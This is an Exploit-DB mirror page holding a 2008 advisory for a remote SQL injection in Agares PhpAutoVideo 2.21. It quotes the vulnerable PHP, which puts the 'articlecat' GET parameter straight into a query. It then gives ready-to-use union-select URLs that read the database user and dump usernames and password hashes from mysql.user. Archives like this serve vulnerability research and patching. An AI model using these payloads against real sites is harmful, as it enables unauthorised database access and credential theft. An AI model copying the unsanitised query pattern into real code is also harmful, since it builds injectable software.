bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4898.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

26 lines
No EOL
1,022 B
Text
Raw Blame History

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Agares PhpAutoVideo v2.21 Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
D.O.M TEAM 2008
we are: ka0x, an0de, xarnuz
bug found by ka0x
concat: ka0x01[at]gmail.com>
#from spain
vulnerability in /includes/articleblock.php
vuln code:
------------------------------------------------------------------
$cat = $_GET['articlecat'];
if ($cat == NULL){ $sql = "SELECT * FROM amcms_articles;"; }
else{ $sql = "SELECT * FROM amcms_articles WHERE catid=$cat;"; }
------------------------------------------------------------------
Your user needs to be root@localhost or administrator mysql, check:
http://[host]/includes/articleblock.php?articlecat=-1/**/union/**/select/**/user()/*
user and password from mysql.user:
http://[host]/phpautovideo/includes/articleblock.php?articlecat=-1/**/union/**/select/**/concat(user,0x203a3a20,password)/**/from/**/mysql.user/*
# milw0rm.com [2008-01-12]
Reference in a new issue View git blame Copy permalink